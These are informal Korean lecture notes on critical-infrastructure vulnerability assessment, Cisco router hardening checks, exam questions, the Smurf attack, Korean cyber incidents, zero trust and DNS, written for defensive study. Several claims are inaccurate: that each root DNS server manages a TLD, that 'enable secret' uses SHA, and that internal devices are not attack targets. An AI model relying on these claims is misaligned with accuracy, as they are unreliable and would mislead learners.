정보보호 전문 서비스 기업 (정보보호 전문 서비스 기업은 SK쉴더스를 포함 총 28기업이 있다.)
한국전자통신연구원
주요정보통신 기반시설로 지정이 되어 있는 장소는 1년에 한번 취약점 진단을 꼭 받아야한다
제17조(취약점 분석 및 평가 시기) → 지정 후 6개월 이내에 분석을 해야함, 매년 취약점 분석 평가를 실시해야한다.
과학기술정보통신부고시 제2021-103호:
** 법률은 선택사항이 아닌 의무사항이다.
---
2. 시험문제
보안위협에 대해 설명하고 이것을 제거하기 위해서 설정해야할 것은?
Session Timeout 설정 - 383
주기적으로 세션 체크를 해서 연결이 정상적인지 확인한다 .
Session Timeout 설정 (5분 이하 권고)
Session Timeout 설정 유무를 점검하여 터미널 접속 후 일정 시간(Session Timeout 지정 시간)이 지난 뒤 터미널 세션이 자동으로 종료되어 관리자의 부재(터미널 작업 중 자리 비움, 작업 완료 후 터미널 접속을 종료하지 않 음) 시 발생 가능한 비인가자의 터미널 접근 통제가 되는지 확인하기 위함
Session Timeout 정책이 적용되지 않았을 경우, 관리자 부재 시 비인가자가 네트워크 장비 터미널에 접속된 컴퓨터를 통해 네트워크 장비의 정책 변경 및 삭제 등의 행위를 할 수 있는 위험이 존재함
※ Session Timeout: 터미널 접속 후 유휴 상태 일 때 자동으로 터미널 접속을 종료하는 시간 설정
Community String의 권한은 라이트 권한을 주어서는 안된다. (필요에 의해 사용을 할 수 있어도 기본적으로 라이트 권한은 안됌)
SNMP를 통해서 장비에 접근할 수있는 아이피를 제한한다. access list를 통해 제한한다.
※ Community String: SNMP는 MIB라는 정보를 주고받기 위해 인증 과정에서 일종의 비밀번호인 'Community String'을 사용함
---
4. 시험문제 - 397
스푸핑 방지를 위해 설정해야할 아이피 주소가 아닌것은? (객관식)
■ 장비별 조치방법 예시 공통 특수 용도 주소 차단(RFC 6890 참조)
0.0.0.0/8 자체 네트워크(This host on this network, RFC1122)
10.0.0.0/8 사설 네트워크(Private-Use, RFC1918)
127.0.0.0/8 루프백(Loopback, RFC1122)
169.254.0.0/16 링크 로컬(Link Local, RFC3927)
172.16.0.0/12 사설 네트워크(Private-Use, RFC1918)
192.0.2.0/24 예제 등 문서에서 사용(TEST-NET-1, RFC5737)
192.168.0.0/16 사설 네트워크(Private-Use, RFC1918)
---
5. 시험문제 - 434 (단답형 주관식)
Directed-broadcast 차단
Directed-broadcast 서비스 차단을 통해 DoS 공격을 방지하기 위함
IP Directed-Broadcast는 유니캐스트 IP 패킷이 특정 서브넷에 도착 했을 때 링크-레이어 브로드캐스트로 전환되는 것을 허용함. 이것은 보통 악의적으로 이용되며, 특히 smurf 공격에 이용됨
스머프 공격 은 브로드캐스트
※ Smurf 공격: 인터넷 프로토콜(IP) 브로드캐스트나 기타 인터넷 운용 측면을 이용하여 인터넷망을 공격하는 행위로 브로드캐스트에 대한 응답받을 IP 주소를 변조하여 해당 IP 주소 호스트에 DoS 공격을 감행하는 공격 기법
브로드캐스트 아이피 특징 :
그쪽으로 핑을 보내면 이 범위 안에 있는 호스트들에게 다 뿌린다.
그래서 스머프 공격이라는 것은 내가 공격 대상자 소스 IP를 변조해서 브로드 캐스트 아이피로 핑을 보냄,
브로드캐스트 아이피가 같은 범위 안ㅇ ㅔ있는 호스트에게 request 를 보냄
→ 이것을 받은 호스트들이 공격 reply 를 공격자가 변조를 시킨 공격 대상 IP로 공격을 보냄
이것을 차단하기 위해서 차단해야 하는 항목은 무엇인가?
→ 다이렉트 브로드캐스트 차단.
객관식 3문제 / 주관식 2문제
사설 아이피는 객관식
주관식은 스머프 공격
취약점 진단개요
취약점 : 위협발생의 사전 조건으로 자신이 가진 취약한 속성
안전장치의 부재 + 보안상의 결점
ex)
서버에서 실행되는 오래된 버전의 서비스 ( 버그나 패치등이 나오기 때문에) → 하위 버전의 취약점이 제거가 됌 하지만 제거하기 힘들다.
왜냐면? 업데이트를 했을때 서비스에 문제가 없을지 판단이 안됌. 하나의 버젼이 업데이트되면 다른 운영 버젼들이 못따라 줄 수가 있다. → 그렇기에 항상 취약점이 존재하다.
웹서비스를 운영하기위해 웹
취약점 진단하는 두가지 방법
1 체크리스트 (서버에 보안 설정이 되어있는가?)
2.취약점 진단 스캐너 (스캐너가 패턴을 보내서 돌아오는 값을 보고 판단) - 진단 스캐너 Tool 넥세스
제한없는 네트워크 접근 (보안에서 가장 중요한 핵심)
접근제한 (서버, 라우터, 시스템에서 접근할 수 있는 아이피만 허용하고 나머지는 막는다.) → 가장 효과적인 방법
침입차단 시스템의 열린 포트
우리 회사쪽으로 접근이 허용된 IP주소 포트가 있을거고 접근 허용이 안된 포트를 제어하는 것이 방화벽 / 방화벽이 열린 포트 제어를 안하면 뻥 뚫려있음 → 불필요한 포트까지 오픈되어 있어서 내부로 침입이 가능하는 취약점을 가지고 있다.
TCP 80 , TCP 443 포트를 open 시켜놓으면 누구든지 아이피를 제한을 안해놨기때문에 접속이 가능하다. → 이 홈페이지를 공격하는 해킹 트래픽을 방화벽에서는 막을 수 없다. 이것을 해결해줌 공격IP만잡아주는 것 IPS.
web service 에 특화된 공격을 막아주는 것은 web firewall.
접근통제가 안될때 올드한 버젼에 대해 방어할 수 있는 최선의 대책은 IPS (허용된 트래픽 중에서 해킹성 트래픽을 막아준다.)
UTM :하나의 장비에 여러가지 보안서비스를 구축해놓은 것
(기본기능은 방화벽 + VPN) + 옵션추가해야함 IPS ANTI VIRUS, 유해차단
오래된 서비스에 UTM을 사용하고 있다면 적용가능한 것은 ?
접근통제하는방법
UTM안에 들어있는 IPS 기능을 활성화 시켜야함
느슨한 통제구역의 물리적 보안
서버와 PC에 취약한 패스워드 설정
취약점 발생유형
환경 및 시설
물리적 보호 결여, 불안정한 전원 설비, 재해를 입기 쉬운 입지조건 …
DI → 재해복구
CSP
MSP 구축되어있는 클라우드 시설에 고객의 아이티 시설을 옮겨줘야 하는데, 그러기 위한 컨설팅과 옮겨주는 기술을 MSP 사업이라고 함 → MSP 역할을 하려면 클라우드에 대한 CSP에 대한 이해도가 높아야함
취약점 점검 분류 기준
관리적 관점 : 정보보호관리체계 보안 통제에 근거하여 취약점 점검
기술적 관점 : 아이티 시설 네트워크, 서버, 웹,PC에 대해 취약점 점검
물리적 관점: 문서 검토, 체크리스트, 면담, 실사 통해 점검
취약점 진단 절차
자산 조사 및 분석 → 자단을 파악, 그 회사가 운영하고 있는 아이티 시설들이 리스트화 되어 있는데 그중에서 진단 대상을 설정 예를들어 같은 역할을 하는 장비가 여러대 있을 수 있는데 그 중 샘플링 작업을 통해 뽑아서
진단 대상 선정
제약 사항 및 일정 확인 → 서비스에 영향을 줄 수 있어서 서비스 제한이 없는 야간에 할 수도 있음
진단 수행 → 수동점검, 자동점검으로 나눠짐 // 네트워크 시스템 또는 보안장비는 체크리스트가 나와있다. 리스트의 내용대로 설정이 되어 사용하는지 확인해야함 , 윈도우나 유닉스 계열 서버는 점검해야할 체크리스트가 많다. 한 서버 하는데 2시간 걸림 시간 단축을 위해→ 그래서 서버쪽은 스크립트 기반 점검을 진행한다 (명령하는 것을 하나의 스크립트 파일로 만들어서 하나씩 스크립트를 실행하고 그것을 파일로 만들어줌) ///////// 자동진단(스크립트프로그램, 넥세스라는 진단프로그램을 사용) ////// 수동진단(주요정보통신기반시설 기술적 취약점 분석평가 가이드를 통해 진단을 함)
결과분석
결과 보고서 작성 . 보고
진단 완료
시험 출제 (여기서 부터)
주요 정보통신 기반 시설점검
주요정보통신 기반시설 점검의 이해
네트워크 장비 보안 점검/실습
유닉스 서버 보안 점검
윈도우 서버 보안 점검
보안장비 보안점검
PC 보안 점검
42p
정보통신기반 보호법 : 주요정보통신 기반시설 점검은 정보통신기반보호법 제9조(취약점의 분석 평가) 및 시행령 제17조(취약점 분석 평가의 시기)를 준용하고 있음.
헌법 → 법률 → 대통령령(시행령) → 시행규칙 → 고시
국가법령정보센터에서 모든 법률 정보를 조회할 수 있음
제8조(주요정보통신기반시설의 지점) : 정부기관에 많은 아이티 시스템이 운영되고 있는데 , 이 시스템 중에서 대국민 서비스를 하기 위해 매우 중요한 시스템들을 지정하고 그 시설들을 주요정보통신기반 시설이라고함. ex) 고등학교 성적표는 교육청시설의 nice에 들어가 있음 이런 시설같이 대국민 대상으로 서비스를 하는 시설들을 주요정보통신기반시설으로 지정한다.
보호법 → 제8조 → 1항 // 보호가 필요하다고 인정되는 시설을 지정할 수 있다. (국가사회적 중요성, 기관이 수행하는 업무 정보통신기반시설의 의존도, 상호연계성, 침해사고가 발생시 국가 경제사회에 미치는 피해규모 및 범위, 침해사고 발생가능성 또는 복구의 용이성
취약점 분석 평가를 할 수 있는 기업이 정해져 있다. ( 아무나 취약점 진단을 하는것이 아님) - 한국인터넷진흥원 KISA or 정보공유 분석센터, 정보보호 전문 서비스 기업, 한국전자통신연구원 만 점검 할 수있다.
주요정보통신 기반시설로 지정이 되어 있는 장소는 1년에 한번 취약점 진단을 꼭 받아야한다 (정보보호 전문 서비스 기업은 SK쉴더스를 포함 총 28기업이 있다.)
제17조(취약점 분석 및 평가 시기) → 지정 후 6개월 이내에 분석을 해야함, 매년 취약점 분석 평가를 실시해야한다.
과학기술정보통신부고시 제2021-103호:
** 법률은 선택사항이 아닌 의무사항이다.
시험문제
주요정보통신 기반시설을 점검할 수 있는 자 (아닌것은?)
취약점 분석 평가를 할 수 있는 기업이 정해져 있다. ( 아무나 취약점 진단을 하는것이 아님) - 한국인터넷진흥원 KISA or 정보공유 분석센터, 정보보호 전문 서비스 기업, 한국전자통신연구원 만 점검 할 수있다.
주요정보통신 기반시설로 지정이 되어 있는 장소는 1년에 한번 취약점 진단을 꼭 받아야한다 (정보보호 전문 서비스 기업은 SK쉴더스를 포함 총 28기업이 있다.)
취약점 분석 및 평가 수행
주요정보통신기반시설에 대해 종합적으로 분석 및 평가, 개선하는 일련의 과정
주요시설로 지정된 시설은 스캐너를 사용할 수 없다. 가이드에 있는 체크리스트로 진단해야한다.
기반시설에 대해 취약점을 분석 평가 수행할 수 있는 수행주체
관리기관이 직접 수행할 수 있다.
외부기관 위탁
정보보호 전문서비스 기업, 한국인터넷진흥원, 정보공유 분석센터, 한국전자통신연구원.
보안관제 전문기업은 안된다. 정보보호 전문서비스 기업으로 지정이 된 기업만 취약점 분석이 가능하다.
정보보호전문서비스기업으로 지정받으려면, 정보보호산업진흥법 법률 제23조 ( 학력, 자격증, 경력으로 차별을 둔다. )
수행 주기
시설로 지정된 이후 6개월 이내 평가를 해야한다. + 매년 정기적으로 취약점 분석 평가를 진행 해야한다.
분석 평가 대상 범위
주요정보통신기반시설의 세부시설로 정의된 정보보호 대상 자산
분석 평가 기본항목은 1 관리적 2물리적 3기술적 으로 구분
수행절차
1단계: 취약점 분석 평가 계획 수립 (수행주체, 수행절차, 소요예산, 산출물 등을 포함한 자체 세부계획 수립)
2단계: 취약점 분석 평가 대상 선별
네트워크, 보안, 시스템 별로 그룹화하여 취약점 분석, 평가 대상 목록 작성 (동일한 장비에 대해서 샘플링을 하기 위해서는 그룹으로 묶어놔야한다.)
3단계: 취약점 분석 수행
취약점 분석 요령….
4단계: 취약점 평가 수행
정보보호의 3대 목표 CIA 기밀성, 무결성, 가용성
이것을 기준으로 하여 자산의 중요도를 평가한다.
CIA 관점에서 등급에 따라 급수를 나눈다.
조치불가 취약점으로 분류된 것들 (오래된 버전 등)은 다른 방안을 사용하여 준비를 하고 보고를 하면 된다.
취약점이 발견이 되면, 이용도 부분에서 상 중 하로 평가를 한다.
주요정보통신기반시설 기술적 취약점 분석 평가 상세 가이드
한국인터넷진흥원의 지식플랫폼 → 가이드라인
실습
네트워크 장비 보안 점검
계정관리: 사용하고 있는 계정의 계정정보를 어떻게 하는지
접근관리: 장비쪽으로 접근할 수 있는 접근 통제를 어떻게 해놨는가?
패치관리: 시스템의 버전 정보를 보고 체크
UTM 외부인터넷과 내부 망을 분리하는 역할을 함 → 공인 아이피로 분류되는 것은 UTM
내부 망은 공인 아이피가 아니다 = 외부에서 접속이 안된다. (사설 아이피는 라우팅이 안된다.)
공인 아이피를 사용하고 있는 외부 PC와는 접속이 안된다
내부 망에서 운영하고 있는 네트워크 장비, 보안장비는 해커들의 공격 대상이 되지 않는다.
보안 담당자는 취약으로 나온 부분에 대해 보안조치 계획서를 만든다. → IT 시설을 운영하고 있는 협력사와 협의를 해서 계획서를 만들거나 협력사에게 던짐
만약 장비가 너무 오래되서 조치불가가 떨어져서 장비를 바꿔야 한다면,
장기, 단기, 중기로 나눠져서 계획서를 작성하게 된다.
모델은 안보이고 소프트웨어 버젼만 보고 취약으로 보고서를 작성하지만, 담당자는 너무 오래되서 조치가 안된다. 컨설턴트는 이러한 기준을 생각해야한다.
로그관리: 원격 로그 서버를 운영하고 있느냐, 로깅 버퍼
장비나 서버에서 로그는 보안사고 발생시 추척을 할 수 있는 정보로 중요
로그는 해커가 지우고 나오면 흔적이 안보이기 떄문에, 보안에서 로그는 로그서버에 별도로 저장을 하는 것으로 권고 하고 있음
기능관리
패스워드 설정
371 372 375 377 378 379
383 387 396 397 400 402
CISCO 는 두가지 암호를 사용한다.
enable password
enable secret 일 방향 암호화 SHA 함수에 의해
enable password 는 service password-encryption이 설정이 안되어 있으면 서비스 상에 암호가 그대로 보임 - 377
원격 터미널(VTY) 통해 네트워크 장비 접근 시 지정된 IP에서만 접근이 가능 하도록 설정되어 있는지 점검 - 379
시험문제
Session Timeout 설정 - 383
주기적으로 세션 체크를 해서 연결이 정상적인지 확인한다 . 보통 5분정도 주기
보안위협에 대해 설명하고 이것을 제거하기 위해서 설정해야할 것은?
SNMP 서비스 확인 - 387
각 호스트 에서 정기적으로 여러 정보를 자동으로 수집하여 네트워크 관리를 하기 위한 프로토콜
SNMP 가 없을떄는 Ping 테스트를 통해서 장비 관리를 하였다.
실시간으로 장비의 트래픽. CPU, 메모리 사용률, 누가 어디서 로그인했는지, 실시간 트래픽이 얼마만큼 흘러다니는지 → 실시간으로 관리를 하기 위해서 나온 프로토콜이 SNMP 이다.
SNMP 를 사용하기 위해서는 버젼이 동일해야한다. SNMP community string이 일치해야 정보를 받을 수 있다. 이것을 사용하는데 서버 같은 경우 OS 가 설치가 되면 default 값으로 퍼블릭과 프라이빗 값이 생성이 되는데 이것들은 사용하면 안된다. 왜? 해커가 그 커뮤니? 값을 이용해 장비의 정보를 가져올 수 있다.
그래서 새로운 커뮤니티를 만들어서 사용하는 것을 권고.
커뮤니티 스트링은 권한이 주어짐
need 오닉 - 장비 접근해서 정보만 가져옴 ( CPU얼마
need light 쓸 수 있는 권한 ( config 에 장비를 재현할 수 있다, ex 라우터를 리부팅, 인터페이스를 죽이고, 데몬을 다운 할 수도 있다.)
그런 권한을 가지고 있는 곳은 부가적으로 접근통제를 해서 관리자만 접근할 수 있게 해야한다.
시험문제 - 387
SNMP 서비스와 관련해서 라우터에 config 해야할 사항은??
가장 좋은 방법은 사용을 안하는것
하지만 사용을 해야한다면, 보안을 해야 할 사항들 중 틀린것은?
커뮤니티스트링이 디폴트로 되어있는 것은 사용하면 안된다 ( 삭제해야함)
새롭게 커뮤니티 String을 생성해야하는데 복잡하게 생성을 해야함
커뮤니티스트링의 권한은 라이트 권한을 주어서는 안된다. (필요에 의해 사용을 할 수 있어도 기본적으로 라이트 권한은 안됌)
SNMP를 통해서 장비에 접근할 수있는 아이피를 제한한다. access list를 통해 제한한다.
TFTP 서비스 차단 - 396
TFTP : 계정 정보 없이 정보를 다운로드 받을 수 있는 기능
그래서 이 서비스는 사용하지마라.
Spoofing 방지 필터링 적용 또는 보안장비 사용- 397
사설 네트워크, 루프백 등 특수 용도로 배정하여 라우팅이 불가능한 IP 주소 를 스푸핑 방지 필터링(Anti-Spoofing Filtering)을 적용하여 차단하는지 점검
사설아이피 대역은 라우팅이 안되서 정보가 밖으로 나갈 수 없다.
시험문제 - 397
스푸핑 방지를 위해 설정해야할 아이피 주소가 아닌것은?
사설아이피 범위에 대해서는 명확히 알고 있어야한다.
■ 장비별 조치방법 예시 공통 특수 용도 주소 차단(RFC 6890 참조) 0.0.0.0/8 자체 네트워크(This host on this network, RFC1122) 10.0.0.0/8 사설 네트워크(Private-Use, RFC1918) 127.0.0.0/8 루프백(Loopback, RFC1122) 169.254.0.0/16 링크 로컬(Link Local, RFC3927) 172.16.0.0/12 사설 네트워크(Private-Use, RFC1918) 192.0.2.0/24 예제 등 문서에서 사용(TEST-NET-1, RFC5737) 192.168.0.0/16 사설 네트워크(Private-Use, RFC1918)
내가 보안점검을 하려는 장비의 위치가 방화벽, 백본 밑 스위치 장비이면 사설아이피를 운영하고 있기 때문에 디도스 공격을 받을 일이 없다.
디도스 공격은 경계라우터에 대해서만 설정을 하면 된다.
사용하지 않는 인터페이스의 Shutdown 설정 402
사용하지 않은 포트에 광케이블을 꼿으면 상대라우터와 통신이 된다.
사용하지 않는 포트는 강제로 셧다운을 시키고 사용할때는 노 셧다운을 시켜서 사용해야한다.
사용자·명령어별 권한 수준 설정 - 404
계정별로 레벨을 달리해서 세팅을 하기를 권고하고 있음
VTY 접속 시 안전한 프로토콜 사용 - 409
텔렙 접속, SHH. web 접속
텔렙과 web 은 통신할때 암호화 통신을 안하기 떄문에 중간에 탈취가 될 수 있다.
장비에 접속을 할때는 암호화된 프로토콜 SHH 를 사용해라.
불필요한 보조 입·출력 포트 사용 금지 - 411
사용하지 않는 보조(Auxiliary) 포트의 사용을 제한하여 비인가 접근을 원천 적으로 방지
로그온 시 경고 메시지 설정 - 413
배너정보가 설정되어 있는지 확인
로그온 시 접근에 대한 경고 메시지를 설정한 경우
Router(config)# banner motd #
원격 로그서버 사용 - 415
로컬에 발생되는 메모리를 원격 로그 서버로 실시간 전송을 해야한다.
원격 로그 서버 아이피가 지정이 되어있는지
버퍼 크기가 적절하게 설정되어있는지
정책에 따른 로깅 설정이 되어 있는지
NTP 서버 연동 - 422
시스템마다 시간이 다르면 분석을 할 수 없다. 그래서 시간을 모든 장비들을 동기화 시키기 위해 NTP 서버를 사용 해야한다.
timestamp 로그 설정
TCP Keepalive 서비스 설정 (연관 되는 것이 세션 타임아웃)
네트워크 장비의 Telnet 등 TCP 연결이 원격 호스트 측에 예상치 못한 장애 로 비정상 종료된 경우 네트워크 장비가 해당 연결을 지속하지 않고 해제하 도록 TCP Keepalive 서비스를 설정
Finger 서비스 차단 - 426
Finger 서비스로 사용하여 네트워크 장비에 로그인한 계정 ID, 접속 IP 등 정보 노출 Finger 서비스가 활성화되어 있으면, 장비의 접속 상태가 노출될 수 있고 VTY(Virtual Type terminal)의 사용 현황을 원격에서 파악하는 것이 가능함
핑거 서비스를 가지고 장비에 현재 접속되어있는 계정정보와 아이피 주소를 가져온다. 이 아이피 주소는 서버에 접속하도록 허용되어있는 아이피이다. → 이것을 이용해 아이피 스푸핑을 통해 장비에 접속이 가능하다.
웹 서비스 차단 - 428
HTTP 접속을 하지 않게 해라 → 암호화된 통신이 아니기 떄문
TCP/UDP Small 서비스 차단
※ TCP/UDP Small 서비스는 IOS 11.3 이상에서는 기본적으로 서비스가 제거된 상태이므 로 Small 서버들이 Default로 Disable되어 있지만 낮은 버전의 경우는 직접 설정해 주 어야 함
Bootp 서비스 차단
Bootp 서비스를 차단하지 않을 경우, 다른 라우터 상의 OS 사본에 접속하여 OS 소프트웨어 복사본을 다운로드 할 수 있음
※ Bootp 서비스: 네트워크를 이용하여 사용자가 OS를 로드할 수 있게 하고 자동으로 IP 주소를 받게 하는 프로토콜임
CDP 서비스 차단
시스코 장비 두대가 연결이 되어있으면 한쪽 장비에서 다른쪽 장비의 정보를 알 수있다. 그렇기 때문에 CDP 서비스를 차단해야한다.
시험문제 - 434 (단답형 주관식)
Directed-broadcast 차단
스머프 공격 은 브로드캐스트
※ Smurf 공격: 인터넷 프로토콜(IP) 브로드캐스트나 기타 인터넷 운용 측면을 이용하여 인터넷망을 공격하는 행위로 브로드캐스트에 대한 응답받을 IP 주소를 변조하여 해당 IP 주소 호스트에 DoS 공격을 감행하는 공격 기법
브로드캐스트 아이피 특징 : 그쪽으로 핑을 보내면 이 범위 안에 있는 호스트들에게 다 뿌린다. 그래서 스머프 공격이라는 것은 내가 공격 대상자 소스 IP를 변조해서 브로드 캐스트 아이피로 핑을 보냄, 브로드캐스트 아이피가 같은 범위 안ㅇ ㅔ있는 호스트에게 request 를 보냄 → 이것을 받은 호스트들이 공격 reply 를 공격자가 변조를 시킨 공격 대상 IP로 공격을 보냄
이것을 차단하기 위해서 차단해야 하는 항목은 무엇인가?
→ 다이렉트 브로드캐스트 차단.
Source 라우팅 차단 - 436
목적지 아이피를 보고 찾아간다.
라우터에서 밖으로 인터넷으로 보내려고하는데 목적지 아이피 주소를 가지고 찾아가는 것이 아니고 소스 아이피주소를 가지고 목적지를 찾아가는 방식.
소스 아이피에 대해서는 라우팅을 별도로 운영할 수 있다.
Proxy ARP 차단
Proxy ARP를 차단하지 않을 경우, 악의적인 사용자가 보낸 거짓 IP와 MAC 정보를 보관하게 되며 이로 인해 호스트와 호스트 사이에서 정상적인 통신 이 이루어지지 않을 수 있음
ICMP unreachable, Redirect 차단 - 438
목적지를 찾아갈때 ICMP 프로토콜이 없으면
ICMP 프로토콜을 이용해 사용하는 프로그램 ping test …
ICMP unreachable을 차단하지 않을 경우, 공격자의 스캔 공격을 통해 시스 템의 현재 운영되고 있는 상태 정보가 노출될 수 있음
ICMP redirect을 차단하지 않을 경우, 호스트 패킷 경로를 다시 지정하는 과 정에서 특정 목적지로 가기 위해 고의적으로 패킷 경로를 변경하여 가로챌 수 있음
ICMP unreachable: ICMP unreachable 메시지에는 특정 호스트 및 게이트웨이에 패킷 을 보냈을 때 어떠한 이유로 전달될 수 없는지 나타내는 코드들을 포함하고 있음
identd 서비스 차단 (핑거서비스도 사용자 식별이 가능)
identd 서비스는 TCP 세션의 사용자 식별이 가능하여 비인가자에게 사용자 정보가 노출될 수 있음
Domain lookup 차단
명령어를 잘못 입력할 때 발생하는 불필요한 Domain Lookup를 차단
PAD 차단
mask-reply 차단
스위치, 허브 보안 강화
스위치나 허브에서 포트 보안, SPAN 설정이 적용되고 있는지 점검
스위치에서 패킷을 분석하기 위해 설정해 놓은 것이 있는가? 스니핑과 같음. 이런 것 설정이 안되어 있어야 양호 를 줄 수있음.
'HOST 분석 스킬이 있으면 플레인 비트, host분석 스킬이 없으면 네트워크쪽으로 파라. 보안관제업체보다는 전쟁터로 들어가는 게 더 많이 배울 수 있다. 예를들어, 서비스가 돌아가는 곳 or 게임회사 or 포탈 or e커머스 아무일도 일어나지 않는 곳 보안이 명목적으로 있는 곳은 배울 것이 없다.' + 데이터 분석 시장이 유망하다.
사이버보안 환경변화 2부
우리나라 사이버보안은 3개로 나눠져 있음
민간은 한국인터넷진흥원이 총괄
공공은 국정원 담당
군은 사이버사령부가 담당
우리나라는 아직 3.20 후속조치 체계로 이루어져있다.
2009년 7·7 디도스 공격
2009년 7월 7일을 기점으로 대한민국과 미국의 주요 정부기관, 포털 사이트,
은행 사이트 등이 분산 서비스 거부 공격(DDoS, 디도스)을 당하여 서비스가 일시적으로 마비된 사건이다.
2013년 3.20 사이버테러
2013년 3월 20일 문화방송, 한국방송공사, YTN 등 주요 방송사와 은행, 카드 회사 등의 전산망이 마비되었던 사건
2016년 국방망 해킹사건
원래 국방부 PC는 해킹 방지의 목적으로 인트라넷과 일반 인터넷 회선이 분리가 되어 있습니다. 그런데 국방부 내 한 PC에서 임의의 랜카드를 추가해서 사용하였고 그 랜카드가 결국 일반 인터넷망과 연결되면서 해킹이 시작되어 국방부 내 PC 약 3200대가 해킹되었습니다. 위 해킹은 북한의 소행이라고 추측하였지만 군사기밀은 이미 유출된 뒤 였고 한·미 연합군 대응계획인 ‘작전계획 5027’ 까지 유출되지 않았나 하는 의혹까지 불러들였습니다.
2021년 제로트러스트 선언
누구도 믿지 않겠다는 것이다. 제로 트러스트 전략에 따르면 안전한 영역도 없고, 안전한 사용자도 없다. 내부인이라도 철저한 인증과 신원 확인을 거쳐야 한다. 네트워크를 사용할 수 있는 시스템과 정보 접근 권한도 최소화할 필요가 있다.
2022년 클레이스왑 20억 털린 사건
2022년 카카오톡의 대표 코인 플랫폼 클레이스왑이 BGP 하이재킹으로 22억 규모 암호화폐 탈취 당하였다.
- BGP Hijacking
AS(Autonomous System)라는 IP 대역을 자동으로 관리해 주는 서비스 간에 라우팅 테이블을 공유하는 BGP 프로토콜을 악용하여 공격자가 임의로 설정한 라우팅 테이블을 인접한 AS에 퍼뜨리는 것을 의미합니다.
쉽게 말하면, 통신 시에 통신의 목적지를 공유하는 규칙이 있는데, 이 규칙을 악용하여 공격자가 임의로 설정한 목적지로 변조해버리는 것이죠.
더 쉽게 말하면, 국가 간의 경계를 관리하는 관문을 강도 짓 해서 점거하고, 출입자들의 경로를 강도가 원하는 곳으로 납치해버리는 공격 방식
BGP Hijacking 공격 대응 방안
IP 대역에 맞지 않는 트래픽이 발생하는지 확인
갑자기 응답 패킷의 양이 변하는지 확인
잘못 연결되어 리다이렉트되는 트래픽이 있는지 등을 체크하면서 꾸준히 모니터링
또한, 특정한 대역만 허용하도록 하는 화이트리스트 사용
(화이트리스트: 특정한 IP 주소, 도메인, 또는 네트워크 대역만을 허용하여 접근을 제어하는 보안 메커니즘)
라우팅 정보의 무결성을 보장하는 인증서를 발행하여 통신의 신뢰성을 올리는 방법
복원력 resilience
복원성 있는 네트워크는 주어진 권한을 벗어나는 행위를 빠르게 식별하고 이러한 행위를 격리할 수 있어야 한다.
복원성 있는 네트워크는 통제 가능하도록 구성되어야 하며 이를 통해 잠재적 피해를 최소화할 수 있어야 한다.
Ex) 7.7 DDos 공격은 대응할 수 있는 장치가 구성되어 있지 않았다.
이때 가장 중요한 것은 탐지된 비정상 행위를 격리하되 비즈니스 연속성 보장을 위한 작업의 생존성을 보장하여야 한다.
제로트러스트
제로트러스트는 경계선 기반 방어체계의 한계를 극복하기 위해 구성됨
제로트러스트는 자산의 중요도를 따진다. 자산을 식별하고 가치를 매기는 것이 어렵다.
경계선 기반 방어쳬계의 완벽한 항복 선언 ( 경계선 기반 방어는 증가된 공격표면을 감당하지 못함)
why ? 경계선을 만들 수 없다, 다른회사들 소프트웨어 쓰는거, 클라우드 기반 등을 지켜야 하는데 경계선이 무한히 확장되었기 때문에 지킬 수가 없다. 그래서 좀 더 자른 경계를 만들어야 한다 그게 제로트러스트이다.
네트워크의 구조변화를 통한 네트워크 가시성 확보에서 시작 ( 방어 가능한 네트워크 )
SDN (Software Defined Network), 오버랩 네트워크
SDN과 오버랩 네트워크는 현대의 IT 환경에서 중요한 역할을 하며, 네트워크 관리의 효율성을 높이고, 변화하는 비즈니스 요구에 신속하게 대응할 수 있게 해줍니다. 이러한 기술들은 특히 클라우드 컴퓨팅, 데이터 센터, 그리고 대규모 네트워크 환경에서 큰 주목을 받고 있습니다.
Root DNS
DNS의 역할: DNS(도메인 네임 시스템)는 도메인 이름을 IP 주소로 변환하여 인터넷에서의 통신을 가능하게 합니다.
DNS 서버의 종류: DNS 서버는 다양한 도메인 최상위 도메인(TLD)을 관리합니다. 예를 들어, .com, .net, .org 등의 도메인을 담당하는 DNS 서버가 있습니다.
13개의 DNS 서버 구성: 총 13개의 DNS 서버가 있으며, 이 서버들은 각각 특정 TLD를 관리합니다. 이들 서버는 고유한 IP 주소를 가지고 있으며, 도메인 네임에 대한 정보를 응답합니다.
책임 분담: 각 DNS 서버는 특정 도메인에 대한 요청을 처리합니다. 예를 들어: .com TLD를 담당하는 DNS 서버 .net TLD를 담당하는 DNS 서버 .org TLD를 담당하는 DNS 서버
응답 주소: 각 DNS 서버는 해당 TLD에 대한 도메인 이름의 IP 주소를 응답할 수 있습니다. 이 주소는 로그에 기록된 IP 주소들로 나타납니다.
요약 DNS 서버: 총 13개, 각각 특정 TLD를 관리 TLD 종류: .com, .net, .org 등 기능: 도메인 이름을 IP 주소로 변환하여 응답 응답 주소: 각 DNS 서버는 고유한 IP 주소를 가지고 있으며, 해당 도메인에 대한 정보를 제공
** CCTLD는 "Country Code Top-Level Domain"의 약자로, 국가 또는 특정 지역에 대한 도메인 네임을 나타내는 최상위 도메인입니다.
168.126.63.1 DNS 서버는 자신의 레코드에 해당 도메인 정보가 없으므로, 다른 DNS 서버(예: 루트 DNS 서버 또는 TLD DNS 서버)에 요청을 전달합니다. 응답 수신:
최종적으로, 해당 도메인에 대한 정보가 있는 DNS 서버에서 http://www.naver.com의 IP 주소를 찾아서 168.126.63.1 DNS 서버로 응답합니다. PC로 응답 전달:
168.126.63.1 DNS 서버는 찾은 IP 주소를 PC로 다시 전달합니다. 이제 PC는 http://www.naver.com에 대한 IP 주소를 알고, 해당 웹사이트에 접근할 수 있습니다.
PC -> 설정된 DNS서버 -> Root DNS or TLD DNS server (IP GET) -> 설정된 DNS 서버 -> PC (사이트 접근)
Firewall(정책을 걸어서 끊는다) - > IDS (string기반 침입 탐지장치) - > IPS( IDS + active response ((TCP 통신을 reset 기반 통신차단 기법을 이용해 통신을 차단하는 장치)
패킷에는 타임스탬프가 없고 피캡에는 있다.
패킷: 일반적으로 패킷 자체에는 타임스탬프 정보가 포함되어 있지 않습니다. 패킷은 전송된 데이터의 기본 단위로, 수신 시각이나 생성 시각 같은 메타데이터를 포함하지 않습니다. 피캡 파일:
피캡 파일(.pcap 형식)은 네트워크 패킷을 캡처하여 저장하는 파일로, 각 패킷의 전송 시간 정보를 포함할 수 있습니다. 이 파일은 패킷 분석 도구(예: Wireshark)를 사용하여 열어볼 수 있습니다.
타임스탬프 옮기기 타임스탬프를 피캡 파일에 옮기는 작업은 다음과 같은 절차로 진행됩니다.
